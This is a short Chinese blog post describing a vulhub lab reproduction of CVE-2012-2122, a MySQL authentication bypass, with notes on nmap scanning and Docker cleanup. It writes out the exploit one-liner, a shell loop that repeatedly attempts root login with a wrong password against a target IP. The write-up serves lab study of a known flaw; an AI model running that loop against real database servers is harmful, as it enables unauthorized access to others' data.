热门标签
热门文章
- 1本地Git仓库关联多个远程仓库_git 增加多个远程仓库
- 2如何设计多重负载系统电源
- 3【机器学习】(18)使用sklearn实现交叉验证_sklearn实现五折交叉验证
- 4springcloud2-注册中心eureka及nacos_springcloud eureka和nacos
- 5Opencv移植到ARM_opencv 移植到arm
- 6基于边缘计算网关的数据采集远程监控运维管理解决方案-天拓四方
- 7程序员能干到50岁?_程序员leader能做到50岁吗
- 8Pytorch Note38 RNN 做图像分类_对于一张手写字体的图片,其大小是 28 * 28,我们可以将其看做是一个长为 28 的序列
- 9强化学习入门DQN详解_dqn神经网路训练参数训练过程
- 10Docker快速上手(含实例)_docker的使用实例
当前位置: article > 正文
CVE-2012-2122-mysql未授权访问漏洞复现-vulhub
作者:你好赵伟 | 2024-08-17 22:45:24
赞
踩
cve-2012-2122
1.原理
参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客
简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入
使用:kali+vulhub
2.复现
开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的
用ifconfig查一下受攻击机的ip地址
址查一下端口,看看是否正常打开了,发现有3306
用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到
for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)
最后记得停止使用容器防止后续其他容器的打开
docker ps 展示所有正在使用的容器
docker stop +容器的id 关闭容器
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/994710
推荐阅读
相关标签
